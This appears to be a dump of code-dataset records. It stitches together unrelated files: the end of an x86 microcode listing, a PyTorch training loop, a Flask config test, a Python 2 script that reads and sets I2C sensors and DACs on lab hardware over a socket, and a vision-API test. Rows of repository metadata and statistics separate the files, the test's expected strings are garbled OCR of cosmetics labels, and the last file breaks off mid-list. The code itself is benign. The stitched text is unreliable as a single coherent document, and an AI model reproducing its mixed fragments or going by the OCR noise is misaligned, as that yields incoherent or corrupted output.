vclear dest="InstRegIndex(FLOATREG_XMM_IDX(12, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(13, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(14, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(15, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(16, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(17, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(18, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(19, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(20, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(21, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(22, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(23, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(24, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(25, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(26, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(27, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(28, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(29, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(30, 2))", destVL=16
vclear dest="InstRegIndex(FLOATREG_XMM_IDX(31, 2))", destVL=16
};
''' | 57.447368 | 66 | 0.726981 | 324 | 2,183 | 4.700617 | 0.132716 | 0.210112 | 0.462246 | 0.630335 | 0.939593 | 0.939593 | 0.915955 | 0.915955 | 0.915955 | 0 | 0 | 0.078247 | 0.121851 | 2,183 | 38 | 67 | 57.447368 | 0.716223 | 0 | 0 | 0 | 0 | 0 | 0.9913 | 0.56685 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
40ea9085b02af507219d551597a01f94325787d7 | 3,968 | py | Python | Trainer.py | kellypetrino/pytorch_stacked_hourglass | 424a0a5d494cd8f3bb6fe257459c334ae190a9fd | [
"BSD-3-Clause"
] | null | null | null | Trainer.py | kellypetrino/pytorch_stacked_hourglass | 424a0a5d494cd8f3bb6fe257459c334ae190a9fd | [
"BSD-3-Clause"
] | null | null | null | Trainer.py | kellypetrino/pytorch_stacked_hourglass | 424a0a5d494cd8f3bb6fe257459c334ae190a9fd | [
"BSD-3-Clause"
] | null | null | null | import torch
import numpy as np
class Trainer():
    """Runs a supervised training loop over a DataLoader and checkpoints each epoch.

    Saves the model state dict to ``our_models/`` and the per-batch accuracy/loss
    histories to ``train_acc/`` / ``train_loss/`` after every epoch (those
    directories must already exist).
    """

    def __init__(self, net=None, optim=None, loss_function=None, train_loader=None, device=None, filename=None):
        self.net = net                      # torch.nn.Module to train
        self.optim = optim                  # optimizer over net.parameters()
        self.loss_function = loss_function  # e.g. CrossEntropyLoss
        self.train_loader = train_loader    # yields (X, y) or (X, Y, z) batches
        self.device = device                # target device for batches
        self.filename = filename            # stem used in checkpoint file names

    def train1(self, epochs):
        """Train on (input, label) batches; the net takes a single input.

        Returns (losses, acc): per-batch detached loss tensors and accuracies (%).
        """
        return self._train(epochs, paired=False)

    def train2(self, epochs):
        """Train on (input1, input2, label) batches; the net takes two inputs.

        Returns (losses, acc) as in train1.
        """
        return self._train(epochs, paired=True)

    def _train(self, epochs, paired):
        # Shared implementation of train1/train2 (they only differed in how a
        # batch is unpacked and how the net is called).
        losses = []
        acc = []
        for epoch in range(epochs):
            tot_cor = 0
            tot = 0
            for data in self.train_loader:
                # Move batch to the configured device and unpack it.
                if paired:
                    X = data[0].to(self.device)
                    Y = data[1].to(self.device)
                    target = data[2].to(self.device)
                else:
                    X = data[0].to(self.device)
                    target = data[1].to(self.device)
                # Standard step: zero grads, forward, loss, backward, update.
                self.optim.zero_grad()
                output = self.net(X, Y) if paired else self.net(X)
                loss = self.loss_function(output, target)
                loss.backward()
                self.optim.step()
                # Batch accuracy: count predictions matching the target class.
                _, pred = torch.max(output, 1)
                batch_cor = len(target[target == pred])
                batch_n = len(target)
                tot_cor += batch_cor
                tot += batch_n
                batch_loss = loss.detach()
                print(f'loss, acc: {batch_loss}, {batch_cor/batch_n*100}')
                losses.append(batch_loss)
                acc.append(batch_cor/batch_n*100)
            # BUG FIX: the original printed the literal string "epoch [%d]: finished"
            # because the %-format argument was missing.
            print("epoch [%d]: finished" % epoch)
            tot_acc = tot_cor/tot*100
            # Checkpoint, labelled with epoch number and epoch accuracy.
            torch.save(self.net.state_dict(), f'our_models/{self.filename}_eps{epoch}_{tot_acc:.3f}.pt')
            np.save(f'train_acc/{self.filename}_eps{epoch}_{tot_acc:.3f}.npy', np.array(acc))
            np.save(f'train_loss/{self.filename}_eps{epoch}_{tot_acc:.3f}.npy', np.array(losses))
        return losses, acc
40f457dc30e37776132fa2739f0e5efa5f0e2a70 | 110 | py | Python | tests/test_factory.py | maxrousseau/flask-pfla | 44b1e08f8cf762f18eb221b37f2a68e6af577172 | [
"MIT"
] | 2 | 2018-10-15T03:42:59.000Z | 2018-12-08T00:01:06.000Z | tests/test_factory.py | maxrousseau/densys.org | 44b1e08f8cf762f18eb221b37f2a68e6af577172 | [
"MIT"
] | null | null | null | tests/test_factory.py | maxrousseau/densys.org | 44b1e08f8cf762f18eb221b37f2a68e6af577172 | [
"MIT"
] | null | null | null | #-*- coding: utf-8 -*-
from densys import create_app
def test_config():
    """By default the app factory should not produce an app in testing mode."""
    assert not create_app().testing
| 15.714286 | 35 | 0.690909 | 16 | 110 | 4.5625 | 0.875 | 0.246575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010989 | 0.172727 | 110 | 6 | 36 | 18.333333 | 0.791209 | 0.190909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9052b9febe680fa1dfd984a2be41a13ce109349b | 13,760 | py | Python | Software/util/i2c_control.py | ymei/MimosaBMRDO | e73ce698376a7d38ed17486de217397e66bbc864 | [
"TCP-wrappers"
] | 1 | 2018-09-06T08:26:59.000Z | 2018-09-06T08:26:59.000Z | Software/util/i2c_control.py | ymei/MimosaBMRDO | e73ce698376a7d38ed17486de217397e66bbc864 | [
"TCP-wrappers"
] | null | null | null | Software/util/i2c_control.py | ymei/MimosaBMRDO | e73ce698376a7d38ed17486de217397e66bbc864 | [
"TCP-wrappers"
] | 3 | 2016-08-31T22:29:19.000Z | 2020-07-22T08:41:02.000Z | from command import *
import socket
import time
# Delay (seconds) after each I2C "start" pulse, giving the transaction
# time to complete before the next command is issued.
pulseDelay=0.5
###################################################
# functions for AD7993 control
###################################################
def i2c_ad7993_initial(s, cmd):
    """Initialise the AD7993 ADC over I2C.

    Enables channels 1-4 (cycle through), selects mode 3 with Tconv * 512
    (0x05 into reg@0x03), then points the read address at register 0.
    Returns 0.
    """
    transactions = (
        (0x2201, 0xf802),  # configuration reg: enable ch1~4 (cycle through)
        (0x2201, 0x0503),  # 0x05 into reg@0x03: mode 3, Tconv * 512
        (0x2200, 0x0000),  # set read address
    )
    for ctrl, payload in transactions:
        s.sendall(cmd.cmd_write_register(0, ctrl))     # slave address, mode, wr
        s.sendall(cmd.cmd_write_register(1, payload))  # write address + data0
        s.sendall(cmd.cmd_send_pulse(0x10))            # start the transfer
        time.sleep(pulseDelay)
    return 0
def i2c_ad7993_chipvdd_r(s,cmd): # read VDD for chips --channel 1
# -- start conversion
ret = cmd.cmd_write_register(0,0x2200) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0010) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- read conversion result reg
ret = cmd.cmd_write_register(0,0x2205) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_read_status(0) # read data
s.sendall(ret)
data = s.recv(4)
print [hex(ord(w)) for w in data]
return data
def i2c_ad7993_mimosavdd_r(s,cmd): # read VDD for chips --channel 2
# -- start conversion
ret = cmd.cmd_write_register(0,0x2200) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0020) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- read conversion result reg
ret = cmd.cmd_write_register(0,0x2205) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_read_status(0) # read data
s.sendall(ret)
data = s.recv(4)
print [hex(ord(w)) for w in data]
return data
def i2c_ad7993_ichip_r(s,cmd): # read VDD for chips --channel 3
# -- start conversion
ret = cmd.cmd_write_register(0,0x2200) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0040) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- read conversion result reg
ret = cmd.cmd_write_register(0,0x2205) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_read_status(0) # read data
s.sendall(ret)
data = s.recv(4)
print [hex(ord(w)) for w in data]
return data
def i2c_ad7993_imim_r(s,cmd): # read VDD for chips --channel 4
# -- start conversion
ret = cmd.cmd_write_register(0,0x2200) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0080) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
# -- read conversion result reg
ret = cmd.cmd_write_register(0,0x2205) # set slave address,mode,wr
s.sendall(ret)
ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
s.sendall(ret)
ret = cmd.cmd_send_pulse(0x10) # start
s.sendall(ret)
time.sleep(pulseDelay)
ret = cmd.cmd_read_status(0) # read data
s.sendall(ret)
data = s.recv(4)
print [hex(ord(w)) for w in data]
return data
###################################################
# functions for AD7418 control
###################################################
def i2c_ad7418_initial(s, cmd):
    """Initialise the AD7418: shutdown mode, then software-triggered sampling.

    Returns 0.
    """
    for ctrl, payload in ((0x2801, 0x0001),   # config reg: shutdown mode
                          (0x2800, 0x0000)):  # config reg 2: sample by software
        s.sendall(cmd.cmd_write_register(0, ctrl))     # slave address, mode, wr
        s.sendall(cmd.cmd_write_register(1, payload))  # write address + data0
        s.sendall(cmd.cmd_send_pulse(0x10))            # start the transfer
        time.sleep(pulseDelay)
    return 0
def i2c_ad7418_itself_tmp_r(s,cmd):
    """Read a temperature conversion from the AD7418; returns 4 raw bytes.

    NOTE(review): the original inline comment said "read tmperature from MIMOSA
    chips", while the function name says "itself" -- the comments on this function
    and i2c_ad7418_mimosa_tmp_r appear to be swapped. This one uses config value
    0x01 (no channel-select bit) and reads back from register 0, which presumably
    selects the AD7418's internal temperature sensor -- confirm against the
    AD7418 datasheet.
    """
    # -- start conversion: power up, then trigger (one-shot bit set)
    ret = cmd.cmd_write_register(0,0x2801) # set slave address,mode,wr
    s.sendall(ret)
    ret = cmd.cmd_write_register(1,0x0001) # set write address and write data0
    s.sendall(ret)
    ret = cmd.cmd_send_pulse(0x10) # start
    s.sendall(ret)
    time.sleep(pulseDelay)
    ret = cmd.cmd_write_register(0,0x2801) # set slave address,mode,wr
    s.sendall(ret)
    ret = cmd.cmd_write_register(1,0x0101) # set write address and write data0
    s.sendall(ret)
    ret = cmd.cmd_send_pulse(0x10) # start
    s.sendall(ret)
    time.sleep(pulseDelay)
    # -- point the address register at result reg 0, then read it back
    ret = cmd.cmd_write_register(0,0x2800) # set slave address,mode,wr
    s.sendall(ret)
    ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
    s.sendall(ret)
    ret = cmd.cmd_send_pulse(0x10) # start
    s.sendall(ret)
    time.sleep(pulseDelay)
    ret = cmd.cmd_write_register(0,0x2805) # set slave address,mode,wr (read mode)
    s.sendall(ret)
    ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
    s.sendall(ret)
    ret = cmd.cmd_send_pulse(0x10) # start
    s.sendall(ret)
    time.sleep(pulseDelay)
    ret = cmd.cmd_read_status(0) # read data
    s.sendall(ret)
    data = s.recv(4)
    print [hex(ord(w)) for w in data]
    return data
def i2c_ad7418_mimosa_tmp_r(s,cmd):
    """Read a temperature conversion via the AD7418 analog input; returns 4 raw bytes.

    NOTE(review): the original inline comment said "read tmperature from ad7418
    itself", while the function name says "mimosa" -- the comments on this function
    and i2c_ad7418_itself_tmp_r appear to be swapped. This one sets the 0x80 bit
    in the config value and reads back from register 4, which presumably selects
    the external analog input (MIMOSA temperature sensor) -- confirm against the
    AD7418 datasheet.
    """
    # -- start conversion: power up, then trigger (one-shot bit set)
    ret = cmd.cmd_write_register(0,0x2801) # set slave address,mode,wr
    s.sendall(ret)
    ret = cmd.cmd_write_register(1,0x8001) # set write address and write data0
    s.sendall(ret)
    ret = cmd.cmd_send_pulse(0x10) # start
    s.sendall(ret)
    time.sleep(pulseDelay)
    ret = cmd.cmd_write_register(0,0x2801) # set slave address,mode,wr
    s.sendall(ret)
    ret = cmd.cmd_write_register(1,0x8101) # set write address and write data0
    s.sendall(ret)
    ret = cmd.cmd_send_pulse(0x10) # start
    s.sendall(ret)
    time.sleep(pulseDelay)
    # -- point the address register at result reg 4, then read it back
    ret = cmd.cmd_write_register(0,0x2800) # set slave address,mode,wr
    s.sendall(ret)
    ret = cmd.cmd_write_register(1,0x0004) # set write address and write data0
    s.sendall(ret)
    ret = cmd.cmd_send_pulse(0x10) # start
    s.sendall(ret)
    time.sleep(pulseDelay)
    ret = cmd.cmd_write_register(0,0x2805) # set slave address,mode,wr (read mode)
    s.sendall(ret)
    ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
    s.sendall(ret)
    ret = cmd.cmd_send_pulse(0x10) # start
    s.sendall(ret)
    time.sleep(pulseDelay)
    ret = cmd.cmd_read_status(0) # read data
    s.sendall(ret)
    data = s.recv(4)
    print [hex(ord(w)) for w in data]
    return data
###################################################
# functions for AD5252 control
###################################################
def i2c_ad5252_pot_chip(s, cmd, data):
    """Program the AD5252 digital pot for chip power (RDAC1).

    Writes `data` into the RDAC1 EEMEM, restores EEMEM to the RDAC, then
    issues a NOP. Returns 0.
    """
    for ctrl, payload in ((0x2C01, data << 8 | 0x21),  # EEMEM value for RDAC1
                          (0x2C00, 0x00b8),            # restore EEMEM to RDAC
                          (0x2C00, 0x0080)):           # NOP command
        s.sendall(cmd.cmd_write_register(0, ctrl))     # slave address, mode, wr
        s.sendall(cmd.cmd_write_register(1, payload))  # write address + data0
        s.sendall(cmd.cmd_send_pulse(0x10))            # start the transfer
        time.sleep(pulseDelay)
    return 0
def i2c_ad5252_pot_mimosa(s, cmd, data):
    """Program the AD5252 digital pot for MIMOSA power (RDAC3).

    Writes `data` into the RDAC3 EEMEM, restores EEMEM to the RDAC, then
    issues a NOP. Returns 0.
    """
    for ctrl, payload in ((0x2C01, data << 8 | 0x23),  # EEMEM value for RDAC3
                          (0x2C00, 0x00b8),            # restore EEMEM to RDAC
                          (0x2C00, 0x0080)):           # NOP command
        s.sendall(cmd.cmd_write_register(0, ctrl))     # slave address, mode, wr
        s.sendall(cmd.cmd_write_register(1, payload))  # write address + data0
        s.sendall(cmd.cmd_send_pulse(0x10))            # start the transfer
        time.sleep(pulseDelay)
    return 0
###################################################
# functions for LTC2635 control
###################################################
def i2c_ltc2635_thre_vchip(s, cmd, data):
    """Set the LTC2635 DAC output for the thre_vchip threshold.

    `data` is the DAC code, split into a high byte (upper bits, combined with
    the 0x30 command/channel byte -- presumably write-and-update of one DAC
    channel; verify against the LTC2635 datasheet) and a left-aligned low
    nibble. Returns 0.
    """
    hi = ((data >> 4) << 8) | 0x30  # command/channel byte + upper bits of code
    lo = (data & 0xf) << 4          # low nibble, left-aligned
    s.sendall(cmd.cmd_write_register(0, 0x4102))  # slave address, mode, wr
    s.sendall(cmd.cmd_write_register(1, hi))      # write address + data0
    s.sendall(cmd.cmd_write_register(2, lo))      # data1
    s.sendall(cmd.cmd_send_pulse(0x10))           # start the transfer
    time.sleep(pulseDelay)
    return 0
def i2c_ltc2635_thre_vmim(s, cmd, data):
    """Set the LTC2635 DAC output for the thre_vmim threshold.

    Same transaction as i2c_ltc2635_thre_vchip but with command/channel
    byte 0x31 (presumably the next DAC channel; verify against the LTC2635
    datasheet). Returns 0.
    """
    hi = ((data >> 4) << 8) | 0x31  # command/channel byte + upper bits of code
    lo = (data & 0xf) << 4          # low nibble, left-aligned
    s.sendall(cmd.cmd_write_register(0, 0x4102))  # slave address, mode, wr
    s.sendall(cmd.cmd_write_register(1, hi))      # write address + data0
    s.sendall(cmd.cmd_write_register(2, lo))      # data1
    s.sendall(cmd.cmd_send_pulse(0x10))           # start the transfer
    time.sleep(pulseDelay)
    return 0
###################################################
# functions for PCF8574 control
###################################################
def i2c_pcf8574_reset_latchup(s, cmd):
    """Clear a latch-up condition via the PCF8574 I/O expander.

    Drives LV_vchip and LV_vmim low, then releases all outputs back high.
    Returns 0.
    """
    for payload in (0x0000,   # LV_vchip and LV_vmim low
                    0x00ff):  # back to 1 (all outputs high)
        s.sendall(cmd.cmd_write_register(0, 0x2100))   # slave address, mode, wr
        s.sendall(cmd.cmd_write_register(1, payload))  # write address + data0
        s.sendall(cmd.cmd_send_pulse(0x10))            # start the transfer
        time.sleep(pulseDelay)
    return 0
def i2c_pcf8574_read_latchup(s,cmd):
    """Read the PCF8574 port (latch-up status); returns the 4 raw bytes received.

    NOTE(review): the original comment said "reset latchup" -- a copy-paste from
    the function above; this one uses the read mode (0x2104) and recv()s data.
    """
    ret = cmd.cmd_write_register(0,0x2104) # set slave address,mode,wr (read mode)
    s.sendall(ret)
    ret = cmd.cmd_write_register(1,0x0000) # set write address and write data0
    s.sendall(ret)
    ret = cmd.cmd_send_pulse(0x10) # start
    s.sendall(ret)
    time.sleep(pulseDelay)
    ret = cmd.cmd_read_status(0) # read data
    s.sendall(ret)
    data = s.recv(4)
    print [hex(ord(w)) for w in data]
    return data
def bitmix(x): # handle FPGA internal wire connection bit mixing
return (x & 0x03) << 32 | (x & 0x4) << 29 | (x & 0x7f00) << 16 | (x & 0xff0000)<<0 | (x & 0xff000000)>>16 | (x & 0xff00000000) >> 32
def i2c_prep_cont_read(s, cmd):
    """Prepare continuous I2C reads integrated into the data stream.

    Packs four bit-mixed I2C read commands plus an enable nibble into one wide
    word and writes it, 16 bits at a time, into config registers 7..15:
      - ad7418 adc0                : 0x00002805
      - ad7418 internal temp      : 0x00002805
      - ad7993                    : 0x00002205
      - pcf8574 (i2c_command(35:0) <= config_reg(112+34:112)) : 0x00002105
    """
    word = (bitmix(0x00002805)
            | bitmix(0x00002805) << 35
            | bitmix(0x00002205) << 70
            | bitmix(0x00002105) << 105
            | (0xf << 140))
    for idx in xrange(9):
        chunk = (word >> (16 * idx)) & 0xffff
        s.sendall(cmd.cmd_write_register(7 + idx, chunk))
if __name__ == "__main__":
    # Smoke test: connect to the readout board over TCP and read the
    # chip-VDD channel of the AD7993 once.
    host = '192.168.2.3'  # board IP -- fixed address on the lab network, presumably
    port = 1024
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    cmd = Cmd()  # command builder from `command` (wildcard-imported above)
    data = i2c_ad7993_chipvdd_r(s,cmd)
    s.close()
| 37.088949 | 136 | 0.66032 | 2,119 | 13,760 | 4.156678 | 0.092968 | 0.072888 | 0.108311 | 0.106494 | 0.871367 | 0.860581 | 0.846276 | 0.833106 | 0.820845 | 0.820845 | 0 | 0.074723 | 0.194695 | 13,760 | 370 | 137 | 37.189189 | 0.720152 | 0.280378 | 0 | 0.847896 | 0 | 0 | 0.002057 | 0 | 0 | 0 | 0.06518 | 0 | 0 | 0 | null | null | 0 | 0.009709 | null | null | 0.022654 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
90a615cff1ae4570bb8b8bcdabf1af1f056ddd36 | 9,349 | py | Python | Tests/test_vision_api.py | firstgenius/Cosmetics-Check | a167b35297805894b4c5a8d824402e00e7102494 | [
"MIT"
] | 2 | 2021-05-17T12:23:45.000Z | 2021-05-17T12:23:50.000Z | Tests/test_vision_api.py | firstgenius/Cosmetics-Check | a167b35297805894b4c5a8d824402e00e7102494 | [
"MIT"
] | null | null | null | Tests/test_vision_api.py | firstgenius/Cosmetics-Check | a167b35297805894b4c5a8d824402e00e7102494 | [
"MIT"
] | null | null | null | import unittest
from vision_api import Knot, Cream
from unittest import TestCase
class TestVisionAPI(TestCase):
    def setUp(self):
        """Run OCR on two sample label photos and keep the processed text.

        Loads the raw bytes of example.jpg/example2.jpg, feeds each through
        Cream.detect_text (presumably a Vision API call -- verify) and then
        Cream.process_text, storing the results for the test methods.
        """
        self.cream = Cream()
        with open('example.jpg', 'rb') as f:
            self.photo1 = f.read()
        with open('example2.jpg', 'rb') as f:
            self.photo2 = f.read()
        detected_text_1 = self.cream.detect_text(self.photo1)
        self.processed_text_1 = self.cream.process_text(detected_text_1)
        detected_text_2 = self.cream.detect_text(self.photo2)
        self.processed_text_2 = self.cream.process_text(detected_text_2)
def test_process_text(self):
result_1 = ['Drug Facts', 'Purpose', 'Active ingredient', 'Petrolatum 46.5%', '.Skin protectant (ointment)', \
'Uses', 'I temporarily protects and helps relieve chafed', 'chapped or cracked skin', 'I temporarily protects minor:', \
'I cuts scrapes burns', 'Ihelps protect from the drying effects of wind and cold weather.', 'Warnings', 'For external use only', \
'When using this product do not get into eyes', 'Stop use and ask a doctor if condition worsens symptoms last', \
'more than 7 days or clear up and occur again within a few days', 'Do not use on', 'deep or puncture wounds', \
'Keep out of reach of children. If swallowed', 'get medical help or contact', 'a Poison Control Center immediately', \
'animal bites serious burns', 'Directions', 'apply as needed', 'Inactive ingredients', 'mineral oil', 'paraffin', 'ozokerite', 'dimethicone', \
'hyaluronic acid', 'sodium', 'ydroxide', 'ceramide 1', 'ceramide 3', 'ceramide 6-11', 'tocopheryl acetate', 'phytosphingosine', 'cholesterol', \
'sodium lauroyl lactylate', 'carbomer', 'anthenol', 'water', 'L-proline', 'xanthan gum', 'Questions?', 'B6-free number 1-888-768-2915', \
'ww.cerave.com', 'ile LLC', 'New York', 'NY 10001', 'in USA', 'terave.com', 'ons or Comments? 1-888-768-2915', '02422']
result_2 = ['ВАША КОЖА СклонНА К ПОЯВЛЕНИЮ НЕСОВЕРШЕНСТВ?', 'Мультифункциональная антибактериальная формула косметического средства', 'ОЧИЩЕНИЕ R1 ПРОТИВ НЕСОВЕРШЕНСТВ от NIVEA@ обогащена натуральным', \
'1. Средстве ывания: сокращает и предотвращает появлен в ного блеска', '12 Скраб: рас ет закупоренные поры', 'освобождает кож точек и', 'страктом лии и белой глиной:', 'надолго.', 'Помогает бо с бактериями', \
'вызывающими воспалет', 'Маска: испол я в начестве маски при нане н', 'еколько', 'минут. Улучшае пица', 'HACNAAMTECB 4NCTO M 3AOPOBBIM BMHONTNTEGƯONGE', 'а оубоко очишщена', 'лзаметно более здорсвая', \
'MМЕНЕНИЕ: МЯгкими масерующими ноурвъми никоиями нанесите средство', 'мажную кожу лица', 'шек вбдасти дена смате теплой водой. Используя в', 'вестве маски', 'оставьте на каже на 5- мину загам смойте. Избегайте области', \
'о паз. Ислользуйте ежедневно', 'с качестве маски - 2-3 раза в неделю.', 'к отимального результата используйте всю линию средств NIVEA для проблемной', 'ДЕРМАТОЛОГИЧЕСКИ ПРОТЕСТИРОВАНО.', \
'Fapююривает поры. Использование в пищевых целях опасно для жизни и здоровы.', 'акб для очищення 3 в 1 проти недоліків шкіри від NIVEA®', 'оведено во Франции', 'Космева С.А.С.', 'COSMEVA S.A.S.', \
'1 гuе des Sources F-77176', 'lemple', 'France. Bироблено у Франції', 'Космева С.А.С. Эксклюзивный импорея', 'ок 000 "Байерсдорф"', 'РФ', '105064', 'г. Москва', 'ул. Земляной Вал', 'дом 9. Телефм', \
'мни: 8-800-2000-753. Звонок по России бесплатный. Iмпортер в Укран:', 'кродорф Україна»', 'Україна', 'Київ-04119', 'вул. Дегтярівська 27Т. Годен дод', 'а: см', 'упаковку. Використати до: див. на упаковці. Умови зберiгання: п', \
'р 5-25°С', 'та відносній вологості <80%. Дата виробництва: за 30 міскцв да', 'аинористання.', 'Состав/Склад: Aqua', 'Kаolin', 'Glycerin', 'Alcohol Denat (3% od)', 'Glyceryl Stearate', 'Cetearyl Alcohol', 'Microcrystalline Ce', \
'Butyrospermum Parkii Butter', 'Caprylic/Capric Triglyceride', 'e', 'Magnolia Officinalis Bark Extract', 'Glyceryl Glucoside', 'Potassiom Ca', 'M Phosphate', 'Hydrogenated Palm Glycerides', 'Xanthan Gum', 'Dimethan', \
'Hydrogenated Castor Oil', 'Trisodium EDTA', 'Phenaxyethanol', 'Me', 'paraben', 'Alpha-Isomethyl lonone', 'Citronellol', 'Limonene', 'Par', 'CI 77891', 'CI 42090', 'Арт. 82305', '82305.986.BA.07', 'www.NIVEA.com', '150M', '動台', \
'Beiersdorf AG', 'D-20245 Наmburg', 'reg. tm. of Beiersdorf AG', 'Germany', 'LDPE', 'Beiersdorf', 'Hamburg', '• Wien']
self.assertEqual(self.processed_text_1, result_1)
self.assertEqual(self.processed_text_2, result_2)
def test_find_ingredients(self):
result_1 = ['Drug Facts', 'Purpose', 'Active ingredient', 'Petrolatum 46.5%', '.Skin protectant (ointment)', \
'Uses', 'I temporarily protects and helps relieve chafed', 'chapped or cracked skin', 'I temporarily protects minor:', \
'I cuts scrapes burns', 'Ihelps protect from the drying effects of wind and cold weather.', 'Warnings', 'For external use only', \
'When using this product do not get into eyes', 'Stop use and ask a doctor if condition worsens symptoms last', \
'more than 7 days or clear up and occur again within a few days', 'Do not use on', 'deep or puncture wounds', \
'Keep out of reach of children. If swallowed', 'get medical help or contact', 'a Poison Control Center immediately', \
'animal bites serious burns', 'Directions', 'apply as needed', 'Inactive ingredients', 'mineral oil', 'paraffin', 'ozokerite', 'dimethicone', \
'hyaluronic acid', 'sodium', 'ydroxide', 'ceramide 1', 'ceramide 3', 'ceramide 6-11', 'tocopheryl acetate', 'phytosphingosine', 'cholesterol', \
'sodium lauroyl lactylate', 'carbomer', 'anthenol', 'water', 'L-proline', 'xanthan gum', 'Questions?', 'B6-free number 1-888-768-2915', \
'ww.cerave.com', 'ile LLC', 'New York', 'NY 10001', 'in USA', 'terave.com', 'ons or Comments? 1-888-768-2915', '02422']
result_2 = ['ВАША КОЖА СклонНА К ПОЯВЛЕНИЮ НЕСОВЕРШЕНСТВ?', 'Мультифункциональная антибактериальная формула косметического средства', 'ОЧИЩЕНИЕ R1 ПРОТИВ НЕСОВЕРШЕНСТВ от NIVEA@ обогащена натуральным', \
'1. Средстве ывания: сокращает и предотвращает появлен в ного блеска', '12 Скраб: рас ет закупоренные поры', 'освобождает кож точек и', 'страктом лии и белой глиной:', 'надолго.', 'Помогает бо с бактериями', \
'вызывающими воспалет', 'Маска: испол я в начестве маски при нане н', 'еколько', 'минут. Улучшае пица', 'HACNAAMTECB 4NCTO M 3AOPOBBIM BMHONTNTEGƯONGE', 'а оубоко очишщена', 'лзаметно более здорсвая', \
'MМЕНЕНИЕ: МЯгкими масерующими ноурвъми никоиями нанесите средство', 'мажную кожу лица', 'шек вбдасти дена смате теплой водой. Используя в', 'вестве маски', 'оставьте на каже на 5- мину загам смойте. Избегайте области', \
'о паз. Ислользуйте ежедневно', 'с качестве маски - 2-3 раза в неделю.', 'к отимального результата используйте всю линию средств NIVEA для проблемной', 'ДЕРМАТОЛОГИЧЕСКИ ПРОТЕСТИРОВАНО.', \
'Fapююривает поры. Использование в пищевых целях опасно для жизни и здоровы.', 'акб для очищення 3 в 1 проти недоліків шкіри від NIVEA®', 'оведено во Франции', 'Космева С.А.С.', 'COSMEVA S.A.S.', \
